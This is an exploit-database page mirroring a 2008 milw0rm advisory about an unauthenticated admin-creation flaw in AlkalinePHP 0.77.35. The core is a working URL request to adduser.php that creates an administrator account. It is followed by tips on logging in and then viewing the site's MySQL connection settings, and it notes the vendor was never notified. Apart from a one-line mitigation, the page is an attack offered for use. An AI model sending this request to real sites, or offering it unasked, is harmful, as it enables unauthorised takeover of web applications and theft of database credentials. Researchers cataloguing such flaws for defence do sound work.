AlkalinePHP - exploit.company

vendor:

AlkalinePHP

by:

t0pP8uZz

7.5

CVSS

HIGH

Arbitrary Add-Admin

264

CWE

Product Name: AlkalinePHP

Affected Version From: 0.77.35

Affected Version To: 0.77.35

Patch Exists: NO

Related CWE: N/A

CPE: a:alkalinephp:alkalinephp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin

AlkalinePHP suffers from a insecure adminpage, since the page only handles requests the author probarly thought it was safe not to include admin checking, but when we view the source we can cleary see theres nothing to stop us making our own request. Navigating to the below url (with domain replaced of course) will add a admin account. Do not forget to replace [user] and [pass] with a actual username and password.

Mitigation:

Ensure that admin pages are properly secured and authenticated.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+	          AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin           +==--
--==+================================================================================+==--



[*] Discovered By: t0pP8uZz
[*] Discovered On: 17 MAY 2008
[*] Script Download: https://sourceforge.net/projects/alkalinephp/
[*] DORK: N/A



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION: 
	
	AlkalinePHP suffers from a insecure adminpage, since the page only handles requests the author probarly
	thought it was safe not to include admin checking, but when we view the source we can cleary see theres
	nothing to stop us making our own request.

	navigating to the below url (with domain replaced of course) will add a admin account.

	do not forget to replace "[user]" and "[pass]" with a actual "username" and "password".



[*] Vulnerability:

	http://site.com/adduser.php?real_name=null&user_name=[user]&password=[pass]&level=10&email=null@null.com&website=null&misc=null



[*] NOTE/TIP: 

	after running the above url (with domain replaced of course) it may seem nothing has happend,
	but try loggin in after with the username and password you created.

	admin login is the normal user login.

	once your admin you can look here to view the mysql connection information "/editsettings.php"
	another intresting file to view is "/edituser.php"



[*] GREETZ: 

	milw0rm.com, h4ck-y0u.org, CipherCrew !



[-] peace, 
	t0pP8uZz



--==+================================================================================+==--
--==+	          AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin           +==--
--==+================================================================================+==--

# milw0rm.com [2008-05-18]